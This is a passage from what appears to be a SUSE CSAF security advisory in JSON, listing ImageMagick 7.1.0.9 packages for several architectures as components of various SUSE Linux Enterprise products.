"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x as component of SUSE Linux Enterprise Module for Desktop Applications 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.s390x",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise Module for Desktop Applications 15 SP7",
"product_id": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise Module for Desktop Applications 15 SP7"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-config-7-SUSE-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-config-7-upstream-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "ImageMagick-devel-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagick++-7_Q16HDRI5-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagick++-devel-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagickCore-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "libMagickWand-7_Q16HDRI10-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64"
},
"product_reference": "perl-PerlMagick-7.1.0.9-150400.6.40.1.x86_64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ImageMagick-7.1.0.9-150400.6.40.1.aarch64 as component of SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS",
"product_id": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:ImageMagick-7.1.0.9-150400.6.40.1.aarch64"
},
"product_reference": "ImageMagick-7.1.0.9-150400.6.40.1.aarch64",
"relates_to_product_reference": "SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS"
},
{
"category": "default_component_of",
"full_product_name": {
